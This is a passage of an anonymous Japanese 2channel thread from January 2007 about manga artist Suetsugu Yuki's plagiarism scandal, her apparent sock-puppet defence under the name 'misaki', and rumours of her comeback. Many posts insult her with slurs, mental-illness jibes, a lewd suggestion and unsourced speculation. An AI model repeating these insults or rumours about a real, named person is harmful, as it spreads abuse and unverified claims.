244 :花と名無しさん:2007/01/18(木) 20:03:44 ID:???0
本当に漫画が描きたい、漫画で表現したいという熱意があるんなら別に商業誌で
描かなくてもいいじゃん、自分のサイトで公開すれば。
でもテンテーは「ラクして漫画で稼ぎたい、ちやほやされたい」と思ってる
だろうからムリか。

245 :花と名無しさん:2007/01/18(木) 22:14:01 ID:???0
パクリやトレスを指摘されているというのに
止めないでガシガシ盗作し続けたのは
>「ラクして漫画で稼ぎたい、ちやほやされたい」
って事しかないよな…。
トレスとパクリで量産して自分で「こんなにページ数とって大丈夫か?」って
白々しくブログに書いちゃうような人だもの。

246 :花と名無しさん:2007/01/18(木) 22:35:59 ID:???0
好きだから漫画描きたいわけじゃないんだね。
お金を稼ぎたいだけ。
自力オンリーで描いてるならともかく、人の物トレース
して楽してそれは通らないでしょ。

247 :花と名無しさん:2007/01/18(木) 22:49:26 ID:???O
さっきの浦沢の番組見てたら
やはり末次のような漫画家は存在してはいけないと再確認した。

248 :花と名無しさん:2007/01/18(木) 23:37:58 ID:???0
>>247
同じく・・・。
構図もストーリーもキャラクターすらも
パクリやトレスで済ませるような末次テンテーは
漫画家と呼んではいけないと思ったよ。

249 :花と名無しさん:2007/01/19(金) 06:10:23 ID:???0
見たよ、自分も。
心身共に凄まじいストレスと戦いつつ漫画を描いてるものね。
遊ぶ時間欲しさにお手軽に人のものを盗むような人は漫画家とは呼んではてけないよ。

250 :花と名無しさん:2007/01/19(金) 08:13:03 ID:???0
>>249
むかし、とりみきがチャンピオンで連載持ってる頃
あまりのプレッシャーで電話恐怖症になり
電話が鳴った瞬間にぶっ倒れて救急車で運ばれたっていう話があった。

テンテーはプレッシャーやストレスとは無縁の人生を送っているんだろうなぁ……。

251 :花と名無しさん:2007/01/19(金) 08:47:35 ID:???0
もういい加減にゆるしてあげよーよ

252 :花と名無しさん:2007/01/19(金) 09:06:04 ID:???0
テンテーみたいな盗作漫画家が
「漫画家」を名乗ることは他の漫画家に対して失礼だな。
復帰を考えるなんておこがましいよ。
原稿はトレスで済ませて終わらせておいて、
何が「もう少し時間をかけないと駄目?」なんだか。
もっと時間をかけてじっくりトレスする気しかないくせに。
でもテンテーはそのトレスにかける時間すら惜しかったんだね。

253 :花と名無しさん:2007/01/19(金) 12:14:45 ID:???0
>>251
い・や・♪

>>252
ストレスは無いけど、トレスは有りってことでw

254 :花と名無しさん:2007/01/19(金) 12:24:08 ID:???0
>>251
パクった先生方に謝罪し許してもらう姿を映像で見たら
許す気持ちになる…かもしれない
つーか、こんなところで擁護するヒマあったら、テンテー謝罪するべきだよ

255 :花と名無しさん:2007/01/19(金) 17:02:11 ID:???0
許す許さないとかの権利が一読者であった自分にあるかどうかは
わからないが、ただ、いろんな盗用があったこと、misakiのことは
忘れないし口先での謝罪なんか信用しないというかできないとは思う

256 :花と名無しさん:2007/01/19(金) 17:50:42 ID:???0
少なくとも応援するとか、見守る気持ちにはなれない。
許してやればというけど、misakiの件がある以上心からの謝罪は
一度もなされてないと解釈している。
当人が悪いと思っていない以上、同じ事を繰り返す可能性は高いと思う。

257 :花と名無しさん:2007/01/19(金) 18:43:14 ID:???O
テンテーは再犯の可能性が高い犯罪者のようなもの。
一生、刑務所から出してはいけない存在。

それが末次由紀。

258 :花と名無しさん:2007/01/19(金) 18:46:19 ID:???0
misaki発言の時点ではまだネットで盗作・盗用が騒がれてるだけだったし、実際
その数日後に講談社から連載中の作品打ち切りや単行本がすべて回収・絶版
の処罰が下された訳だから、misaki発言の時点ではまだ先生本人は自分の行っ
てきた事がそれ程悪い事じゃないとの認識しかなかったと思う。悪い事だとは認
識していたが、自分の行ってきた行為がまさかあれだけの騒ぎになる、またはあ
れ程の処罰が下されるという行為だとは認識していなかったと思う。
それは別フレと講談社の謝罪文で自分の認識が甘かったと述べている事で理解
できる。

復帰しても必ず同じ事を繰り返すのは目に見えているという発言が多いけど、少な
くとも自分にはそうは思わない。
騒動や打ち切り・絶版・回収となってしまった今、盗作・盗用が悪いという事は先生
本人自身(他の漫画家より)が痛い程感じているはずだから。

以上、叩かれるの覚悟で書きました。

259 :花と名無しさん:2007/01/19(金) 18:58:36 ID:???0
いや、私は復帰するのは別に構いませんよ。
wktkと立ち読みしつつデジャヴを感じるコマがあったら検証ですよ。
周囲も前以上に厳しい目でチェックするだろうね。

260 :花と名無しさん:2007/01/19(金) 19:04:35 ID:???O
そりゃ復帰したら話題性は抜群だよ?

でもテンテーが喉から手が出るほど望んでいた「ちやほや」はもう一生手に入ることはないんだよ

261 :花と名無しさん:2007/01/19(金) 19:09:46 ID:???O
末次は恥さらしの腐れ外道として読者に認識されたわけで
感動ものを描いても、盗用して自演した婆が綺麗事ほざいてるようにしか見えないわけで

262 :花と名無しさん:2007/01/19(金) 19:40:57 ID:???0
あれだけ長時間に渡ってパクや盗作やトレスを行って漫画描いてきたんだから
本来テンテーは漫画が描けないんだよ。
全作絶版・回収なんて漫画家としてのこれまでの存在を抹消されたのと同じ事。
テンテーにはデビューからこれまでを失われた10年だと思って別の道を探して
もらいたい。
だって今度は全部自力なんて絶対無理だから。
パクやりたくなっちゃうから、また。

263 :花と名無しさん:2007/01/19(金) 22:24:13 ID:???0
>>258
それも信じられない事のひとつ。
いい大人とは思えない認識の甘さ。
自分一人で作品を作り上げる誇りも、最初からなかったのではないか
とすら思える。


264 :花と名無しさん:2007/01/19(金) 22:27:22 ID:???0
認識が甘かったですまされないんじゃないのか?
十年以上も盗作してて公式HPでつっこみはいったら
のらりくらりとはぐらかし、コミックの該当ページのコマを修正。
わかってて盗作してた。編集部が全部かばってくれるはずだったのに
かばってもらえなかった。担当が当時副編集長をしていたから
「こんな騒ぎをもみ消せる」という計算はあったはず。

「認識が甘かった」じゃなくて「計算が甘かった」の間違いだろうな。
いやはや本当にどこまでも腐った漫画家だよな。

265 :花と名無しさん:2007/01/19(金) 23:07:41 ID:???O
編集に媚びてるわりには、友人には編集の悪口を言ってるし。
本当に腹黒な女だよ末次さんは。

266 :花と名無しさん:2007/01/20(土) 09:18:55 ID:/khlvsPGO
っていうかまだやってたんだ。このスレw

267 :花と名無しさん:2007/01/20(土) 09:55:51 ID:???O
回収してない書店あったし

268 :花と名無しさん:2007/01/20(土) 10:14:38 ID:???0
>>266
筆を折る宣言がないし、復帰の噂もあり。
噂がデマだと確認されたら懐漫板移動もありかと。

269 :花と名無しさん:2007/01/20(土) 10:19:35 ID:???0
>>265
テンテーって友人いるんだ。
でもその友人から「編集の悪口いってらw」って他に話されていたら、
テンテーの脳内だけで友人扱いなのかも。

270 :花と名無しさん:2007/01/20(土) 11:13:39 ID:???O
騒動当時、検証サイトでのあまりのトレスの多さに
「この人病気じゃね?」と思った

271 :花と名無しさん:2007/01/20(土) 13:24:01 ID:???0
>>258
うん、自分も同じことを繰り返すとは思わない。
もっと巧妙になって、人体をトレスするにしてもバレにくいところから捜してきそう。

> 盗作・盗用が悪いという事は先生
> 本人自身(他の漫画家より)が痛い程感じているはず

「悪い」ではなく「バレたらマズイ」だと思う。

272 :花と名無しさん:2007/01/21(日) 12:28:01 ID:???0



     も う テ ン テ ー を ゆ る し て あ げ て く れ



273 :花と名無しさん:2007/01/21(日) 12:39:33 ID:???0
テンテーは漫画家として嫌いだし
復帰もしなくていいと思う。
盗用作家だし、復帰しても一度ついた悪いイメージは取り払えないと思うから。

でももうテンテーを許してあげてほしいってレスも同意。
盗用を許すのでは全く無く、ずーっと粘着的に興味を持ち続けてる姿勢の
人を見てたら、自分もそう(許してやれ)って思ってくる。
もう放っといてやればいいのでは。
復帰しようとしなかろうと、盗用発覚する前まではそんなに知名度も無かった人なんだから、
信者は喜べばいいし、愛想が尽きたなら放っとけばいいと思う。

末次スレでこんなこと言うのも変かも知れないけど、
テンテーを漫画家失格と言いながら好奇心を持ち続ける人を見ていて
違和感を感じてしまったので……。
最初末先生を好きだった人を除いて、
作品に魅力がないと感じている人、単純にゴシップ的な興味だけで復帰して欲しいと思っている人らなんかは、
もうそんな漫画家どうでもいいじゃんって言いたくなってきました。

274 :花と名無しさん:2007/01/21(日) 12:40:48 ID:???0
許さん。

275 :花と名無しさん:2007/01/21(日) 12:47:52 ID:???O
同人とか自費出版はしてないの?

276 :花と名無しさん:2007/01/21(日) 13:21:25 ID:Tcrm2E/JO
自称美人漫画家らしいから
脱いじゃうってのはどう?

『あの盗作美人漫画家が衝撃ヘアヌード「裸一貫出直します」』

食い付きそうなメディアはいくらでもありそうだが。

277 :花と名無しさん:2007/01/21(日) 13:26:50 ID:???0
林葉を連想した

278 :花と名無しさん:2007/01/21(日) 13:31:49 ID:???0
>>272
あのmisaki発言の後なのに
なあなあにしろと?
そんな義理がどこにある?

279 :花と名無しさん:2007/01/21(日) 13:45:38 ID:???0
行ってきた行為に対する重い罰を受けた事も
事実なんだし、許してあげられる考えは持てる。

280 :花と名無しさん:2007/01/21(日) 13:56:49 ID:???0
許してあげて〜とか言われても
そもそもここの住人が許す許さないなんて
テンテーにとっちゃどうでもいい話だろうし…
もう検証もほとんどやってないし、思い出話って感じであーだこーだ言ってるだけだしねえ

まあ、復帰したら
その時はみんなはりきって検証するだろうけどw

281 :花と名無しさん:2007/01/21(日) 13:59:49 ID:???0
当人の意思表示がないしねぇ。
悪徳商法の広告塔をやってたことといい、どうも感覚が一般人と違うみたいだし
今でも運が悪かったとしか思ってないかもしれない。

282 :花と名無しさん:2007/01/21(日) 14:31:11 ID:???0
「もう許してあげて」という人が理解できない。
ただ末次スレで末次の話をしてるだけ。
「私はもう許してあげてるんだけど〜」という考えって
おかしくないか?

・・・末次テンテーみたいになんだかずれてると思う。





283 :花と名無しさん:2007/01/21(日) 14:40:44 ID:???0
処分くらっても本人に反省が感じられないからね。
儲の手紙に「頑張る」みたいな事書いてたとか。
処分くらって月日も浅いのに・・・。
なぜ「ありがとう、ごめんなさい」だけで済ませれないのか。
「処分くらったから、もうやり直ししてもいいじゃない」なんて有り得ない。
最低でも十年は漫画を描いてはいけないと思う。
それだけの長い間、盗作を続けてきたんだから。
こんなんで復活させたら「盗作はばれなきゃいい」がまかり通ってしまう。

284 :花と名無しさん:2007/01/21(日) 14:51:45 ID:???0
許してやってっていう人達、やな意味で典型的日本人の反応だと思う。
罪を犯した人に甘くて、被害者の事を考えてない感じ。
パクられた作家さん達にいったらどうです、先生を許してあげてって。
言えるものならね。

285 :花と名無しさん:2007/01/21(日) 15:10:56 ID:???0
まあでも被害者以外の人がさんざ言うのも
見てて違和感感じる人もいるってことで。
実際は好きな漫画家さんを盗用されたファンの傷は深いわけだけどね。

自分は興味ある人がいる限り話題にし続けて自然とは思うが、
テンテーには復帰して欲しくない派だから、
検証したいがために復帰して〜〜ってのはなんかなぁって主。
どうせパクリだと分かっている作品を待ち望むのはなんだか……
だって末が自力で描くとは思えないんです。三つ子の魂百までを体で表しているお方だと思う。

286 :花と名無しさん:2007/01/21(日) 15:11:18 ID:???0
回収になろうが絶版になろうがテンテーの犯した罪は消えない。
一生償え。

287 :花と名無しさん:2007/01/21(日) 15:12:50 ID:???0



     ゆ る し て や れ



288 :花と名無しさん:2007/01/21(日) 15:15:00 ID:???0
>>285
まあそれはそうなんだけど、逆に言うと今でも残ってる末次ファン
が、パクられた人達は許してくれて当然みたいに考えるのも不遜だ
と思うわけ。
何と言ってもサイトもお休みの状態のまま、御当人が何も言わない
ままってのがね。

289 :花と名無しさん:2007/01/21(日) 15:23:30 ID:???0
盗作をやめるチャンスはいくらでもあったのにな。
指摘してくれる人がいたのに鼻で笑って続けてた。
指摘してくれた人だって末次の作品を好んで読んでただろうに。
更正するチャンスを自分で潰してたんだ。
しかしサイトも休止状態って何故綺麗に閉鎖しないの?
そういう姿勢がいやらしいってわからないのだろうか。


290 :花と名無しさん:2007/01/21(日) 15:24:13 ID:???0
御当人は2ちゃんではいっぱい発言してらっしゃると邪推

291 :花と名無しさん:2007/01/21(日) 15:34:24 ID:???0
一時閉鎖なのは復活の時があるかもしれないからでしょ。

292 :花と名無しさん:2007/01/21(日) 15:49:05 ID:???0
ゆるしてやれって人達はどうせよっていうんだろう?
復帰したら暖かく見守れってこと?
反省の色もなく、同じ事やりそうな人に無理ってもの。
ああ、このスレ?
misakiなんていう素敵なお友達がおいでの方が、たかが
ここで何を書かれても痛くも痒くもないんでは?

293 :花と名無しさん:2007/01/21(日) 16:44:41 ID:???0
完全閉鎖しない→たとえ復帰しても心を入れ替えてやるつもりはない。
という事の表れかと。
普通なら今までの公式HPは完全に閉じて、
復帰した時に一から公式HP立ち上げると思う。
そういう考えがテンテーの心にはないのでしょう。

294 :花と名無しさん:2007/01/21(日) 17:41:52 ID:???O
パクリ矢吹がエロ漫画を描いて神扱いされたように
テンテーも性コミ辺りでエロ漫画を描くしかない

295 :花と名無しさん:2007/01/21(日) 18:39:40 ID:???0
一度綺麗に身を引いて数年後にまた現れるって言うんなら、まだ理解できないわけでもない。
復活を願ってた人が多かったんだなとか、(自分はそうは思わないけど)テンテー流のお涙
頂戴モノを読みたい人も多いんだなと思えるかも知れない。
でもサイトは一時休止・儲には「復帰に向けて絵の勉強中です」・そして「女性誌で復帰」
なんつー噂が流れるなんて事が続いたら、やっぱりこの人は信用できない。
虎視眈々と復活を狙ってるとしか思えないんだよね。
そういう行為すべてが「筆を置く」って自分で言ったことを全部ウソにしてしまってる。

296 :花と名無しさん:2007/01/21(日) 21:18:06 ID:???0
>>295
確かに自分で言った「筆を置く」という事を実行しない人が
謝罪文出してても信用なんて到底できないよなぁ。
盗作という悪い事をしてたんだから、最低でも自分で言った事は
ちゃんと守らなきゃどうするんだ?と思う。
やる事なすこと嘘ばかりじゃないか。



297 :花と名無しさん:2007/01/21(日) 21:31:50 ID:???0
”筆を置く”というあの発言があった時、実際かなりネットユーザーに
追い詰められていたからついつい発言してしまったんだと思われる。
即ち、冷静な状態ではなかったかと。

漫画家に限らず、タレント、スポーツ選手、政治家など、
公に辞めると言って辞めなかった人も多いので、テンテー
もそのタイプかも。

298 :花と名無しさん:2007/01/21(日) 21:40:03 ID:???O
テンテーは分裂症

299 :花と名無しさん:2007/01/21(日) 21:40:25 ID:???0
筆を置く発言のあとにmisakiで自演の擁護だよね?
「筆を置く」というのは誘い受け発言の多かったテンテーの心にもない言葉だったんだよ。
冷静な状態じゃないにしろ数時間後に自演擁護してるんだから
やっぱり末次由紀は嘘つきの大泥棒なんだとしか思えない。

300 :花と名無しさん:2007/01/21(日) 22:20:25 ID:???0
結局末次先生を許せるのは、彼女がどんな卑劣な行為をしても目を
つぶれる信者の領域の人達だけって事じゃないかな?
そういう人達は自分達が少数派だという自覚を持つべきだね。
彼女の行為は簡単に復帰が許されるレベルの物じゃない。

301 :花と名無しさん:2007/01/22(月) 00:10:41 ID:???0
あの謝罪文読み直したら筆を置く気なんかサラサラなさそうなのは明白だった。
>ここを今見てくださっている方にしかこういう謝罪の言葉は届かないので、
>話が湧き上がるたびに同じ文章を繰り返さないといけないかもしれません。
>でもその時はそうしたいと思います。
「また話が持ち上がったら謝ればいいんでしょ?」ってカンジで辞める気ゼロ。

302 :花と名無しさん:2007/01/22(月) 01:51:16 ID:BeQqzrY/O
とりあえず反省してるフリでもしとくか、
ってのがみえみえだもんなあ。

303 :misaki:2007/01/22(月) 02:15:29 ID:???O
謝罪したんだし、許してあげましょうよ。
謝罪に対して「あれがたりない・これがたりない」と言っても誰だって
対応しきれないですよ。
説明を求めて、たとえ説明してもらっても、結局私たちは言い訳とかに
感じるんだろうし。
わたしはいろんな検証を見て、そのあと作品を読んでも、
変わらず末次先生の漫画が好きです。正直な気持ちでそう思ったんだから
否定しないでもらいたいけど、絵が似てることなんてたいした問題じゃな
いように感じました。マネだけで漫画なんかかけないです。
もちろん「大した問題」なんだろうけど、末次先生の漫画の雰囲気がどの
単行本にも流れていて、そこがきっと好きな理由なので、そう思った気持ち
を素直に書きます。当事者が訴えてもいないのに、責任問題・・・?今後につ
いて・・・?そんなこと詰問する権利も無いのに代わりに裁こうとしてるみた
いでどうしても疑問です。

たしかに、こういう状況だと「漫画家やめたほうが楽」
ってなりますよ。でもふんばって書きつづけてください;;
新しい作品を楽しみにしています。









misakiこと、末次由紀より。( ̄ー ̄)ニヤリッ

304 :花と名無しさん:2007/01/22(月) 02:55:50 ID:V2ljlPQO0
あの謝罪文で「謝罪した」と言い切る末次・・・
この自作自演擁護の文章なら常識的に考えて
漫画家辞めるのが当たり前なんだが。

盗作漫画家だけに非常識極まりない思考の持ち主か。
この自作自演擁護文を読むと「復帰」なんてさせてはいけないな。
反省のない犯罪者程、性質の悪い者はない。
再犯確立相当あるだろ。

305 :花と名無しさん:2007/01/22(月) 03:08:06 ID:???0
なにこいつら。騒いでるから復帰するのかと
思いきや復帰するかもという話で蜂の巣をつついたような
さわぎになってる。馬鹿?

ゆるしてやれ!てのもなんか違うし。そもそもたかが漫画の
盗作でしょう?殺人だって五年で出てくるのにたかが漫画の
絵をまねしただけなんだよ?
騒いでる連中もこれしか興味の無いカスに見える。
おまえら逝ってよしだよ。

306 :花と名無しさん:2007/01/22(月) 03:09:16 ID:???0
>303
この作者のばかさかげん、みてみなよ。
こんなカスを粘着してたたいてる連中もそれに
輪をかけたくず。

307 :花と名無しさん:2007/01/22(月) 04:07:45 ID:???0
>>306
やあ、こんなカスを粘着してたたいてるそれに輪をかけたくずどもに罵声をあびせて
悦に入っている最高にカスなきみw

308 :花と名無しさん:2007/01/22(月) 05:29:11 ID:???0
>>305
たかだか万引きくらい皆やってる、な人達と
交わすべき言葉はない

309 :花と名無しさん:2007/01/22(月) 05:37:50 ID:???O
>>305>>306
本気で匿名だと信じてんの?
めでてーな

310 :花と名無しさん:2007/01/22(月) 06:33:22 ID:???0
人を殺してないから泥棒が許されるって殆ど意味不明。


311 :花と名無しさん:2007/01/22(月) 06:40:12 ID:???O
>>306は末次の別の人格。

312 :花と名無しさん:2007/01/22(月) 07:23:26 ID:???0
>>303
>謝罪したんだし、許してあげましょうよ。
↑の一行は捏造。
テンテーはこんな事言っていない。

313 :花と名無しさん:2007/01/22(月) 09:03:18 ID:???0
謝罪に対して「あれがたりない・これがたりない」と言われたって誰だって
対応しきれないじゃない。
説明を求められて、たとえ説明してあげても、結局アンタたちは言い訳とかに
感じるんだろうし。
わたしはいろんな検証を見て、そのあと自分の作品を読み直しても、 変わらず
アタシ自身が好きなのよ。正直な気持ちでそう思ったんだから 否定しないで
もらいたいわね、絵が似てることなんてたいした問題じゃないじゃない。
マネだけで漫画なんかかけないんだから。
もちろん「大した問題」なんだろうけど、天然チャンの雰囲気がどの単行本の
おまけにも流れていて、そこがきっと好きな理由なので、そう思った気持ち
を素直に書くわ。当事者が訴えてもいないのに、責任問題・・・?今後につ
いて・・・?アンタたちにはそんなこと詰問する権利も無いくせに代わりに
裁こうとしてるみたいでどうしてもムカツク〜。

たしかに、こういう状況だと「漫画家やめたほうが楽」
ってなるかもね。でもふんばって書きつづけてやるわよ;;
新しい作品を楽しみにしててね。

misaki=テンテーだと分かった時ホンネはこうか!と誰もが思ったはず。

314 :花と名無しさん:2007/01/22(月) 09:33:34 ID:???0
末次由紀=misakiの自演擁護も痛いけど
その前の盗作認めた謝罪文らしきものも痛い。
どちらも本音は「盗作して何が悪い、その都度謝ればいいんでしょ」。
復帰説があるというのが不思議だ。

315 :花と名無しさん:2007/01/22(月) 13:00:54 ID:???0
>>313
これ、釣りですよね?
まるで擁護にも応援にもなってないしw
今までの信者書き込みの中で、一番笑わせていただきました。
ああでも、末次さんが独力で作品描けそうにないことだけは
判ってらっしゃるようで安心しました。

316 :花と名無しさん:2007/01/22(月) 13:39:48 ID:???0
>>315
>>313はテンテーがmisakiの名で自作自演擁護した文を
テンテーの本音に訳したものだと思われ。
なので、信者書き込みでもなんでもなし。

317 :花と名無しさん:2007/01/22(月) 13:47:23 ID:???O
自演さえしなければ
風当たりもここまで強くならなかったと思う

318 :花と名無しさん:2007/01/22(月) 14:02:03 ID:???0
謝罪してない謝罪文もどうかと思う。

319 :花と名無しさん:2007/01/22(月) 14:19:21 ID:???0
釈明文だと思ってました

320 :花と名無しさん:2007/01/22(月) 21:52:10 ID:???0
>>315
そこまで読んだなら最後の一行まで読んであげなよ

321 :花と名無しさん:2007/01/23(火) 08:12:43 ID:???0
音楽だったらB'zがチャンピオンだな。

【盗作】B'zのパクリ考察スレ pt.27【日本一】
http://music7.2ch.net/test/read.cgi/musicj/1168617632/

322 :花と名無しさん:2007/01/23(火) 08:20:24 ID:???0
>>287


      い  や  だ




323 :花と名無しさん:2007/01/23(火) 12:43:37 ID:???0
数々のパクリとトレスでできた漫画と
ブログでいかに自分が仕事(原稿)が速いのかを書いていたの考えると
この人の罪ってものすごく深いと思う。

324 :花と名無しさん:2007/01/23(火) 12:52:32 ID:???0
それと悪徳商法の広告塔とかね。
確かに他に盗作の類をやってる作家はいるかもしれないけど
この人程話のタネが尽きない人も珍しい。

325 :花と名無しさん:2007/01/23(火) 14:02:41 ID:???0
ブログでの言動と盗作行為を照らし合わせて
考えるとどんなに酷いかわかる。
「魔が差して過ちを犯してしまったのよ!」なんて
言い逃れできないほど確信犯的だなと。
アシスタントさんはいる前に主線入れは終わってるとか、
他の漫画家さんは時間に追われてるらしいとか。
でも自分は原稿上げるのが速い。もっと時間かけたほうがいいのかな?とか…。

326 :花と名無しさん:2007/01/23(火) 14:10:44 ID:???0
自演misakiの
>マネだけで漫画なんかかけないです。

・・・いや、マネだけで漫画描いてきただろ。
ストーリーも絵もマネして手を加えただけなんだし。
それでも足りなくてトレースとパクリしたんだろう。
末次の頭の中って怖い。

327 :花と名無しさん:2007/01/23(火) 14:11:49 ID:???0
ブログもう見れないから自分はなんとも判断できないな。

328 :花と名無しさん:2007/01/23(火) 15:54:16 ID:???0
かけないと 思い ます
じゃなくて
かけないです

なんだよねw

329 :花と名無しさん:2007/01/23(火) 16:14:46 ID:ew1q5PbNO
【復活は】
【アサヒ芸能で】

330 :花と名無しさん:2007/01/23(火) 16:17:20 ID:???0
>>329
アサ芸はジョージ秋山先生とか、どおくまん先生とか結構大御所が執筆してるお( ^ω^)

331 :花と名無しさん:2007/01/23(火) 17:00:13 ID:???0
>>328
ほんとだワロス
misakiタソって本当に頭の足りない子なんだね

332 :花と名無しさん:2007/01/23(火) 18:59:40 ID:???O
パクリで金儲けしたくせに
マンガ喫茶でコーヒー飲んでるサラリーマンを
年収700万以下なのによくコーヒー頼めるなぁとかバカにした日記書いたりしてたよね

333 :花と名無しさん:2007/01/23(火) 18:59:47 ID:???0
テンテーは神に選ばれし漫画家。
ドラキュラの如く必ず復活する!

334 :花と名無しさん:2007/01/23(火) 19:00:52 ID:???0
>>332
まんが喫茶じゃなくてコーヒー店ですお

335 :花と名無しさん:2007/01/23(火) 19:13:19 ID:???0
本当にそんな馬鹿にした発言があったんだ・・・
今となっては日記が読めなくなっているのが残念・・・

336 :花と名無しさん:2007/01/23(火) 19:14:04 ID:???0
コーヒー屋で自分のお金でコーヒーおかわりして咎められるなんて…。

337 :花と名無しさん:2007/01/23(火) 20:01:28 ID:???0
自分は泥棒漫画家のくせに
一生懸命働いてほっとひと息ついてコーヒーを
おかわりしてるサラリーマンに言える言葉かよ。
泥棒して得た年収が700万以上ある事を
何か勘違いしてないか?

338 :花と名無しさん:2007/01/23(火) 20:07:52 ID:???0

  彡川川川川川ミヽ
 彡ノノノ从人人从ノノノ
彡彡 ■■  ■■ |ミ     _        〃〃〃 ヽヽ
彡|    ̄’ | ’ ̄ |ミ   /M)      〃〃〃〃 ヽヽヽ
彡|      .。| 。   |ミ ./G/_     彡ノノノノ人ヽヽヽミ
彡ノヽ    ,,   /ミ (M/ | D )/__  彡 ´\ /` ミ   パクリをして何が悪い
ノノノ \   .3   /川ミ/ ./,   | D ) 7∠  ミ| ´゚` | ´゚` |〃  人生売れた者の勝ちなのだよ
 ノノノ  \__/ .川 / ./    ~ ̄ ~ ̄  ミ|`  `´  ´|〃
   |  /       / ./\    ____..ヽ. ´ ̄` /.___
    | /       / ./ /\  /    / /\ ・ /| \
   ゚|/       / .//   | 〉    > /\  ̄ /ヽ <
    |       / ./|     |/   /  |   ̄ ̄   |  \


339 :花と名無しさん:2007/01/23(火) 20:10:16 ID:???0
クッキースレにテンテーのお仲間が登場したね。


340 :花と名無しさん:2007/01/23(火) 20:23:12 ID:???0
>>338
テンテーのように言うほど売れてない場合はどうしたら?
つまりパクリ負け?

341 :花と名無しさん:2007/01/23(火) 20:25:49 ID:???0
しかし末次さんて御当人は自分が頭良いつもりだったのかね?
コーヒー店の発言といい、インフォリパブリックの事といい、
どう考えても顰蹙物としか思えないし、人に好かれる自分を
演出する上ではマイナス以外の何者でもないと思うが。

ところで復帰嘆願書って、どういう顛末になったの?
一部ファンの言うように大勢のファンが本当にいたのなら
さぞかしたくさんの署名が集まったんでしょうね。

342 :花と名無しさん:2007/01/23(火) 20:26:23 ID:???0

  彡川川川川川ミヽ
 彡ノノノ从人人从ノノノ
彡彡 ■■  ■■ |ミ     _        〃〃〃 ヽヽ
彡|    ̄’ | ’ ̄ |ミ   /M)      〃〃〃〃 ヽヽヽ
彡|      .。| 。   |ミ ./G/_     彡ノノノノ人ヽヽヽミ   打ち切り・絶版・回収 (笑)
彡ノヽ    ,,   /ミ (M/ | D )/__  彡 ´\ /` ミ   俺達はパクリまくっているけど、
ノノノ \   .3   /川ミ/ ./,   | D ) 7∠  ミ| ´゚` | ´゚` |〃  音楽生命終わってないぜ!
 ノノノ  \__/ .川 / ./    ~ ̄ ~ ̄  ミ|`  `´  ´|〃
   |  /       / ./\    ____..ヽ. ´ ̄` /.___
    | /       / ./ /\  /    / /\ ・ /| \
   ゚|/       / .//   | 〉    > /\  ̄ /ヽ <
    |       / ./|     |/   /  |   ̄ ̄   |  \


343 :花と名無しさん:2007/01/23(火) 21:00:04 ID:???0
講談社は絶版回収を躊躇わずに行った

ここに全ての答えがある


344 :花と名無しさん:2007/01/23(火) 22:17:29 ID:???0
>>339
末次テンテーも仲間ができて感涙だおwwwwwww

345 :花と名無しさん:2007/01/23(火) 22:18:01 ID:???0
you


346 :花と名無しさん:2007/01/24(水) 00:56:42 ID:???0
◎●◎クッキーを語ろうPart15◎●◎
http://comic7.2ch.net/test/read.cgi/gcomic/1163948635/

347 :花と名無しさん:2007/01/24(水) 01:29:52 ID:???0

  彡川川川川川ミヽ
 彡ノノノ从人人从ノノノ
彡彡 ■■  ■■ |ミ     _        〃〃〃 ヽヽ
彡|    ̄’ | ’ ̄ |ミ   /M)      〃〃〃〃 ヽヽヽ
彡|      .。| 。   |ミ ./G/_     彡ノノノノ人ヽヽヽミ
彡ノヽ    ,,   /ミ (M/ | D )/__  彡 ´\ /` ミ   末次のパクリなど
ノノノ \   .3   /川ミ/ ./,   | D ) 7∠  ミ| ´゚` | ´゚` |〃  俺達の足元にも及ばんわ
 ノノノ  \__/ .川 / ./    ~ ̄ ~ ̄  ミ|`  `´  ´|〃
   |  /       / ./\    ____..ヽ. ´ ̄` /.___
    | /       / ./ /\  /    / /\ ・ /| \
   ゚|/       / .//   | 〉    > /\  ̄ /ヽ <
    |       / ./|     |/   /  |   ̄ ̄   |  \

348 :花と名無しさん:2007/01/24(水) 01:41:26 ID:???O
年収700万って高級とり(年齢にもよるが)じゃんねえ…
テンテーの世界ではパクッて楽にお金が稼げるから、経済感覚が麻痺しちゃってるんだね。

349 :花と名無しさん:2007/01/24(水) 02:05:54 ID:???O
× 高級とり
○ 高給とり
間違えたorz

350 :花と名無しさん:2007/01/24(水) 06:28:17 ID:???0
「年収700万程度のリーマンよりも収入が上」ですよ





むぐー><

351 :花と名無しさん:2007/01/24(水) 06:56:18 ID:???0
ま、今現在何やってらっしゃるか存じませんが
年収は700万に遠いであろう事は確か。
当然の報いというか。

352 :花と名無しさん:2007/01/24(水) 08:32:48 ID:???0
あれだけのことをしていながら罪悪感ゼロ。
実に汚い。
なりすましで自己擁護したエセ漫画家の醜さを実感させてもらっているよ。

353 :花と名無しさん:2007/01/24(水) 09:05:55 ID:???0

  彡川川川川川ミヽ
 彡ノノノ从人人从ノノノ
彡彡 ■■  ■■ |ミ     _        〃〃〃 ヽヽ
彡|    ̄’ | ’ ̄ |ミ   /M)      〃〃〃〃 ヽヽヽ
彡|      .。| 。   |ミ ./G/_     彡ノノノノ人ヽヽヽミ
彡ノヽ    ,,   /ミ (M/ | D )/__  彡 ´\ /` ミ   HEY! HEY!
ノノノ \   .3   /川ミ/ ./,   | D ) 7∠  ミ| ´゚` | ´゚` |〃
 ノノノ  \__/ .川 / ./    ~ ̄ ~ ̄  ミ|`  `´  ´|〃
   |  /       / ./\    ____..ヽ. ´ ̄` /.___
    | /       / ./ /\  /    / /\ ・ /| \
   ゚|/       / .//   | 〉    > /\  ̄ /ヽ <
    |       / ./|     |/   /  |   ̄ ̄   |  \


354 :花と名無しさん:2007/01/24(水) 09:09:26 ID:???0
>>350
久しぶりのむぐーに吹いた

355 :花と名無しさん:2007/01/24(水) 20:33:24 ID:SKye6M7a0
それにしてもあの後どうして、現在何やってんだろうね?
周りにいたとりまきも、悪徳商法の関係者以外
離れちゃったろうね。

356 :花と名無しさん:2007/01/24(水) 20:40:57 ID:???0
>355
広告塔だったなら悪徳商法の関係者も「漫画家」って肩書きとれたテンテーに
用はないのでは?
もしかしたらどっぷりスタッフになってたりするかも知れんが。

357 :花と名無しさん:2007/01/24(水) 20:44:38 ID:???0
それはそれでwktk

358 :花と名無しさん:2007/01/24(水) 20:48:58 ID:???0
テンテーの担当ってテンテーをかばった事があるらしいね。

359 :花と名無しさん:2007/01/24(水) 20:59:24 ID:???0
>>358
そうだろうね。
でなきゃ十年はもたないでしょ。
まあ庇う方も方だけど、元々パクリやろうなんて発想の漫画家が
問題なわけで。
